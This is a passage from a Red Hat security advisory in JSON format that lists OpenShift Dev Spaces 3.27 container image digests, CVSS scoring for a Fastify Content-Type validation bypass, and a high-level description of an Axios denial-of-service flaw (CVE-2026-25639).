"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Fastify: Fastify: Validation bypass due to malformed Content-Type header leading to integrity impact"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
